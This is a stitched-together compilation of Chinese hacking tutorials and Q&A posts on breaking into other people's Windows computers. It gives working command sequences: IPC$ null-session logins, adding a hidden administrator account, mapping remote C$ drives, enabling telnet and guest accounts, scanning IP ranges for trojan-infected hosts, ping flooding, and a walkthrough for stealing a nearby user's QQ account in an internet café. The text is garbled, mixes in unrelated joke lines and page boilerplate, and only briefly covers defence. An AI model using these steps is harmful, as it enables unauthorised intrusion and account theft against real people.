黑客DOS命令或其它命令入侵他人电脑的具体步骤
如何成功入侵局域网电脑
如何成功入侵局域网电脑我们在入侵的时候难免遇到忘记一些小步骤和小命令的时候。
下面是店铺跟大家分享的是如何成功入侵局域网电脑,欢迎大家来阅读学习。
如何成功入侵局域网电脑入侵局域网电脑方法一1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可迚入。
入侵局域网电脑方法二1、下载必备的工具软件。
1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我迚行第二步!2、运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就迚入了网络刺客II的主界面。
第三步在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就迚入了“搜索因特网主机”界面。
第四步迚入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。
“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
入侵别人的电脑最简单方法
入侵别人的电脑最简单方法
使用黑客入侵别人的电脑最简单的方法是通过发送一封电子邮件,里
面带有一个恶意的文件。
恶意文件可以是一个可执行程序,比如称为“病毒”的程序。
这种程序会执行一些被黑客精心设计的功能,以达到入侵的
目的。
例如,这种程序可以用来收集有关收件人的个人信息,包括登录凭据、文件和数据,以及任何可以访问的网络设备,比如路由器和服务器。
接收
到邮件的用户只需打开文件,这个病毒就可以轻松侵入,并有可能潜入到
整个网络系统。
同样,黑客也可以通过漏洞来入侵攻击目标的计算机。
漏洞是指系统
中的一些软件或者协议的漏洞,可以用来入侵系统。
例如,网络设备的默
认密码或者操作系统的漏洞,这些都可能被黑客利用,用来入侵目标的网
络系统。
另一种侵入目标网络系统的方法是使用分布式拒绝服务(DDoS)攻击。
DDoS攻击是通过使用大量计算机(称为“红蚂蚁”)来发送大量垃圾信
息以瘫痪目标网络系统的攻击。
这种攻击可以假冒真正的用户,向目标发
送大量的请求,使其受不了,从而使它无法正常工作。
还有一种方法是使用入侵探测系统(IDS)来入侵。
IDS是一种专门
的软件系统,可以检测有关恶意软件的活动。
教你如何侵入别人的电脑
教你如何侵入别人的电脑.txt“恋”是个很强悍的字。
它的上半部取自“变态”的“变”,下半部取自“变态”的“态”。
1、取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入黑客命令之1:NET只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!这里我们假如你得到的用户是hbx,密码是123456。
假设对方IP为127.0.0.1net use \\127.0.0.1\ipc$ "123456" /user:"hbx"退出的命令是net use \\127.0.0.1\ipc$ /delte下面的*作你必须登陆后才可以用.登陆的方法就在上面.----------------------下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add只要显示命令成功,那么我们可以把他加入Administrator组了.net localgroup Administrators heibai /add----------------------这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.net use z:\\127.0.0.1\c$----------------------net start telnet这样可以打开对方的TELNET服务.----------------------这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
DOS详细攻击教程
D O S详细攻击教程本页仅作为文档封面,使用时可以删除This document is for reference only-rar21year.March一, ping用来检查网络是否通畅或者网络连接速度的命令。
作为一个生活在网络上的管理员或者黑客来说,ping 命令是第一个必须掌握的DOS 命令,所利用的原理是这样的网络上的机器都有唯一确定的 IP 地址,给目标 IP 地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我可以确定目标主机的存在可以初步判断目标主机的操作系统等。
下面就来看看它一些常用的操作。
先看看协助吧,DOS 窗口中键入:ping / 回车,所示的协助画面。
此,只掌握一些基本的很有用的参数就可以了下同)-t 表示将不间断向目标 IP 发送数据包,直到强迫其停止。
试想,如果你使用 100M 宽带接入,而目标 IP 56K 小猫,那么要不了多久,目标 IP 就因为接受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了-l 定义发送数据包的大小,默认为 32 字节,利用它可以最大定义到 65500 字节。
结合上面介绍的 -t 参数一起使用,会有更好的效果哦。
-n 定义向目标 IP 发送数据包的次数,默认为 3 次。
如果网络速度比较慢, 3 次对我来说也浪费了不少时间,因为现在目的仅仅是判断目标 IP 否存在那么就定义为一次吧。
说明一下,如果 -t 参数和 -n 参数一起使用, ping 命令就以放在后面的参数为标准,比方“ ping IP -t -n 3 虽然使用了 -t 参数,但并不是一直 ping 下去,而是只ping 3 次。
另外, ping 命令不一定非得 ping IP 也可以直接 ping 主机域名,这样就可以得到主机的 IP下面我举个例子来说明一下具体用法。
这里 time=2 表示从发出数据包到接受到返回数据包所用的时间是 2 秒,从这里可以判断网络连接速度的大小从 TTL 返回值可以初步判断被 ping 主机的操作系统,之所以说“初步判断”因为这个值是可以修改的这里 TTL=32 表示操作系统可能是 win98小知识:如果 TTL=128 则表示目标主机可能是 Win2000 如果 TTL=250 则目标主机可能是 Unix至于利用 ping 命令可以快速查找局域网故障,可以快速搜索最快的 QQ 服务器,可以对别人进行 ping 攻击…这些就靠大家自己发挥了二, nbtstat 该命令使用 TCP/IP 上的 NetBIOS 显示协议统计和当前 TCP/IP 连接,使用这个命令你可以得到远程主机的 NETBIOS 信息,比如用户名、所属的工作组、网卡的 MAC 地址等。
入侵别人的电脑最简单方法完整版
入侵别人的电脑最简单方法HEN system office room 【HEN16H-HENS2AHENS8Q8-HENH1688】黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。
其实黑客的最高境界在于防守,不在于进攻。
所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。
现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法:4.在Windows目录(system32\drives\etc)5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。
以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。
对付上面进攻的最好办法就是隐藏你的IP地址。
MultiProxy是利用HTTP代理隐藏IP。
方法是打开IE浏览器,在地址栏中输[Ctrl+Shift+F8]组合键,把所有代理IP以外的内容删除后,再用“替换”功能修改成形如×××.×××.×××.×××:port格式。
操作很简单,把IP与端口号之间的两个空格替换成“:”就可以了。
修改完成后,将文件保存成TXT文件。
接下来启动MultiProxy程序,点击主界面的[选项]按钮,在“常规选择”页中把“缺省超时”的时间设长些如“30”,其他设置保持不变。
切换到“代理服务器列表”页面,按右下角的[菜单]→[文件]→[导入代理列表]命令,将刚才保存的代理IP文件打开,此时会弹出一个“检查代理”对话框,按[确定],再按一次[确定]返回程序主界面。
如果刚才选择的代理IP文件不能导入到列表中,可能文件中存在不符合格式的IP,将它们修改正确,保存后重新导入即可。
网吧内如何入侵别人电脑
网吧内如何入侵别人电脑大家都知道网吧经常都是病毒来源的“常客”,下面让小编带大家了解一下这些所谓的“常客”是如何来的?现在网吧管理软件有很多,但大多有这样或那样的漏洞,于是就出现了很多解除网吧软件和网吧软件解除技巧,可以免费上网,可以使用“命令提示符”方式,可以使用管理员权限等等。
于是网吧也成了虚拟财产丢失最严重的地方。
但只要网吧管理员的水平足够还是能够避免这种情况发生的。
告诉你我以前还在网吧是如何得到MMQQ 号的技巧吧,有点复杂,主要是让你了解一些黑客入侵时所用到的命令。
第一步:先要确定MM所用电脑的IP,网吧电脑的编号和IP地址通常是相同或是高一位,比如网吧中编号为20的电脑,IP一般是192.168.0.20或192.168.0.21(192.168.0.1留给路由器),不仅如此,机器名也有规律,20号电脑的机器名通常是Wangba20,这样只要知道了MM用的电脑,再进入到“命令提示符”,Ping Wangba20就可以得到IP地址,比如192.168.0.20。
第二步:有了IP,就可以开始连接上MM的电脑了,由于网吧内的电脑多使用没有打过补丁的Windows 2000,而且登录电脑的用户名也多是“user编号”的形式空密码形式,所以在“命令提示符”下输入net use //192.168.0.20/ipc$ "" /user:""及net use //192.168.0.20/ipc$ "" /user:"user20"命令建立连接。
连接成功后,就要关闭对方电脑中的杀毒软件了,右击“我的电脑”,选择“管理”,在弹出窗口中右击“计算机管理(本地)”,选择“连接到另一台计算机”,连接至192.168.0.20,启动“Telnet”服务(见图1)(图1 “计算机管理”可以直接管理远程电脑)。
第三步:在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。
入侵个人主机网络攻击的步骤
入侵个人主机网络攻击的步骤第一步:隐藏自已的位置为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。
所谓“肉鸡”通常是指,HACK实现通过后门程序控制的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。
在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。
当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。
此时,攻击者们会使用一些扫描器工具,以试图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。
这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。
当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。
第四步:获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。
他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。
此外,为了避免目标主机发现,清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。
如:下载敏感信息;窃取帐号密码、个人资料等。
三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。
【DOS命令NET命令入侵他人计算机的方法】_hack吧_贴吧
【DOS命令NET命令入侵他人计算机的方法】_hack吧_贴吧.txt dybo23136位粉丝1楼只要你会CTRL+C CTRL+V 都能成功1:NET只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!这里我们假如你得到的用户是hbx,密码是123456。
假设对方IP为127.0.0.1net use 127.0.0.1ipc$ 123456 /user:hbx null密码为空退出的命令是net use 127.0.0.1ipc$ /deletenet share是查看主机共享资源我们用它建一个秘密共享目录吧net shareme=c:winntsystem32这样这个机器就有了一个名为me的共享目录,而打开它就是winnt下的system32目录,如果你用win2000的系统就知这个目录有多重要了,如果不想要也好办netshare me /delete 呵呵,没有了,是不是很方便的啊。
下面的操作你必须登陆后才可以用.登陆的方法就在上面.下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add只要显示命令成功,那么我们可以把他加入Administrator组了.net localgroup Administrators heibai /add这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.net use z:127.0.0.1c$net start telnet这样可以打开对方的TELNET服务.这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes(特别注意:这个命令是把原来被禁用的guest帐户再次激活)net user guest /active:no这样这个guest的用户就又被禁用了这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。
黑客DOS命令
一步:进入系统1. 扫描目标主机。
2. 检查开放的端口,获得服务软件及版本。
3. 检查服务软件是否存在漏洞,如果是,利用该漏洞远程进入系统;否则进入下一步。
4. 检查服务软件的附属程序(*1)是否存在漏洞,如果是,利用该漏洞远程进入系统;否则进入下一步。
5. 检查服务软件是否存在脆弱帐号或密码,如果是,利用该帐号或密码系统;否则进入下一步。
6. 利用服务软件是否可以获取有效帐号或密码,如果是,利用该帐号或密码进入系统;否则进入下一步。
7. 服务软件是否泄露系统敏感信息,如果是,检查能否利用;否则进入下一步。
8. 扫描相同子网主机,重复以上步骤,直到进入目标主机或放弃。
黑客入侵的五个步骤对于网络安全来说,成功防御的一个基本组成部分就是要了解敌人。
就象防御工事必须进行总体规划一样,网络安全管理人员必须了解黑客的工具和技术,并利用这些知识来设计应对各种攻击的网络防御框架。
根据来自国际电子商务顾问局白帽黑客认证的资料显示,成功的黑客攻击包含了五个步骤:搜索、扫描、获得权限、保持连接,消除痕迹。
在本文中,我们就将对每个阶段进行详细的分析。
在将来的文章中,我还会对检测方式进行详细的说明。
第一阶段:搜索搜索可能是耗费时间最长的阶段,有时间可能会持续几个星期甚至几个月。
黑客会利用各种渠道尽可能多的了解企业类型和工作模式,包括下面列出这些范围内的信息:互联网搜索社会工程垃圾数据搜寻域名管理/搜索服务非侵入性的网络扫描这些类型的活动由于是处于搜索阶段,所以属于很难防范的。
很多公司提供的信息都属于很容易在网络上发现的。
而员工也往往会受到欺骗而无意中提供了相应的信息,随着时间的推移,公司的组织结构以及潜在的漏洞就会被发现,整个黑客攻击的准备过程就逐渐接近完成了。
不过,这里也提供了一些你可以选择的保护措施,可以让黑客攻击的准备工作变得更加困难,其中包括了:确保系统不会将信息泄露到网络上,其中包括:软件版本和补丁级别电子邮件地址关键人员的姓名和职务确保纸质信息得到妥善处理接受域名注册查询时提供通用的联系信息禁止对来自周边局域网/广域网设备的扫描企图进行回应第二阶段:扫描一旦攻击者对公司网络的具体情况有了足够的了解,扫描软件:他或她就会开始对周边和内部网络设备进行扫描,以寻找潜在的漏洞,其中包括:开放的端口开放的应用服务包括操作系统在内的应用漏洞保护性较差的数据传输每一台局域网/广域网设备的品牌和型号在扫描周边和内部设备的时间,黑客往往会受到入侵防御(IDS)或入侵检测(IPS)解决方案的阻止,但情况也并非总是如此。
如何用ddos命令攻击别人的电脑
如何用ddos命令攻击别人的电脑大家好,首先要给大家道歉,之前说过的这一期发视频教学的,但是录好的教学视频,被腾讯审核不通过,所以没能发布,在这里小编说一声对不起,不过后期我们会继续多发视频的。
今天给大家带来了用ddos命令攻击对方电脑的教程,希望大家能喜欢。
下面说教程:dos命令之net,教你怎么攻击别人电脑。
通过扫描21端口或3389端口就可以入侵一般黑客入侵所需要的几个常用命令1:NET只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!这里我们假如你得到的用户是hbx,密码是123456。
假设对方IP 为127.0.0.1net use \\127.0.0.1\ipc$ '123456' /user:'hbx'退出的命令是net use \\127.0.0.1\ipc$ /delte下面的操作你必须登陆后才可以用.登陆的方法就在上面.----------------------下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add只要显示命令成功,那么我们可以把他加入Administrator组了.net localgroup Administrators heibai /add----------------------这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.net use z:\\127.0.0.1\c$----------------------net start telnet这样可以打开对方的TELNET服务.----------------------这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes----------------------这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
黑客DOS命令或其它命令入侵他人电脑的具体步骤.txt会计说:“你晚点来领工资吧,我这没零钱。
”你看得出我擦了粉吗?虽然你身上喷了古龙水,但我还是能隐约闻到一股人渣味儿。
既宅又腐,前途未卜。
既宅又腐,前途未卜。
你被打胎后是怎么从垃圾桶里逃出来的?史上最神秘的部门:有关部门。
不可否认,马赛克是这个世纪阻碍人类裸体艺术进步最大的障碍!黑客DOS命令或其它命令入侵他人电脑的具体步骤?_百度知道百度首页 | 百度知道 | 登录新闻网页贴吧知道 MP3 图片视频百科帮助设置百度知道 > 电脑/网络 > 反病毒相关问题添加到搜藏已解决黑客DOS命令或其它命令入侵他人电脑的具体步骤?悬赏分:10 - 解决时间:2008-2-28 11:48哪位大侠指教下~本人只会用一些软件和命令入侵,听说黑客不用工具的,非常想了解一个具体的步骤和方法.. 提问者: DYX211 - 见习魔法师二级最佳答案IPC$入侵一唠叨一下:网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!二什么是ipc$IPC$(Internet ProcessConnection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.解惑:1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到WindowsNT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表三建立ipc$连接在hack攻击中的作用就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,whatu want,u can do!!(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.四 ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)五 ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径 : 网络有问题;错误号53,找不到网络路径: ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码:原因很明显了;错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。
(连接域控会出现此情况)错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.六如何打开目标的IPC$(此段引自相关文章)首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令net share ipc$来开放目标的ipc$。
从上面可以知道,ipc$能否使用还有很多条件。
请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七如何防范ipc$入侵1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous= DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)2禁止默认共享1)察看本地共享资源运行-cmd-输入net share2)删除共享(每次输入一个)net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有e,f,……可以继续删除)3)停止server服务net stop server /y (重新启动后server服务会重新开启)4)修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师5设置复杂密码,防止通过ipc$穷举密码(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创)八相关命令1)建立空连接:net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)3)映射默认共享:net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$4)删除一个ipc$连接net use \\IP\ipc$ /del5)删除共享映射net use c: /del 删除映射的c盘,其他盘类推net use * /del 删除全部,会有提示要求按y确认九经典入侵模式这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。